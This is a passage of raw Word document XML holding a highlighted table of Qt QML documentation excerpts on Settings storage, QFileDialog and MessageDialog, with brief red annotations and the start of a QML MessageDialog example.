            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>section will be created in the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Qml Runtime settings file (or registry entry)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. If an application is started via a custom C++ main() function, it is </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>recommended to set the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1814" w:anchor="applicationName-prop" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>name</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId1815" w:anchor="organizationName-prop" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>organization</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> and </w:t>
            </w:r>
            <w:hyperlink r:id="rId1816" w:anchor="organizationDomain-prop" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>domain</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in order to control the location of the application's settings. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Intbu this</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. If you use </w:t>
            </w:r>
            <w:hyperlink r:id="rId1817" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Settings</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> objects in other parts of an application, they will be stored in other sections of the same file.</w:t>
            </w:r>
            <w:r w:rsidR="00097A9A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00097A9A" w:rsidRPr="00097A9A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Intbu this object </w:t>
            </w:r>
            <w:r w:rsidR="00097A9A" w:rsidRPr="00097A9A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>and its peculiarities.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F413C2" w:rsidRPr="00F413C2" w:rsidRDefault="00490E7E" w:rsidP="00C16B41">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1818" w:history="1">
              <w:r w:rsidR="00F413C2" w:rsidRPr="00C16B41">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QFileDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C16B41" w:rsidRPr="00C16B41">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F413C2" w:rsidRPr="00C16B41">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>stores its settings globally instead of per-application</w:t>
            </w:r>
            <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. Platform-native file dialogs may or may not store settings in various platform-dependent ways.</w:t>
            </w:r>
            <w:r w:rsidR="00C16B41">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C16B41" w:rsidRPr="00C16B41">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Intbu the last sentence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00763692" w:rsidRPr="002230B8" w:rsidTr="008F1DE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00B73CF4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>MessageDialog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00B73CF4" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1819" w:history="1">
              <w:r w:rsidR="00B73CF4" w:rsidRPr="005A37A4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-dialogs-messagedialog.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B73CF4" w:rsidRPr="00B73CF4" w:rsidRDefault="00B73CF4" w:rsidP="00B73CF4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The most basic use case for a MessageDialog is a </w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>popup alert</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. It also </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows the user to respond</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in various ways depending on which </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>buttons are enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. The dialog is </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>initially invisible</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>You need</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to set the properties as desired first, then set visible to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> true or call open().</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73CF4" w:rsidRPr="00B73CF4" w:rsidRDefault="00B73CF4" w:rsidP="00B73CF4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Here is a minimal </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>example</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to show an alert and exit after the user responds:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73CF4" w:rsidRPr="00B73CF4" w:rsidRDefault="00B73CF4" w:rsidP="00B73CF4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B73CF4" w:rsidRPr="00B73CF4" w:rsidRDefault="00B73CF4" w:rsidP="00B73CF4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>import QtQuick 2.2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73CF4" w:rsidRPr="00B73CF4" w:rsidRDefault="00B73CF4" w:rsidP="00B73CF4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>import QtQuick.Dialogs 1.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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Pr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>z</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>mport</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>QtQuick</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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0437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>QtQuick</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Dialogs</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="00490E7E"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hyperlink r:id="rId1820" w:history="1">
              <w:r w:rsidR="000437DC" w:rsidRPr="000437DC">
                <w:rPr>
                  <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                  <w:color w:val="21BE2B"/>
                  <w:sz w:val="23"/>
                  <w:szCs w:val="23"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>MessageDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="000437DC" w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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0437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    id: messageDialog</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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0437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    title: </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="23"/>
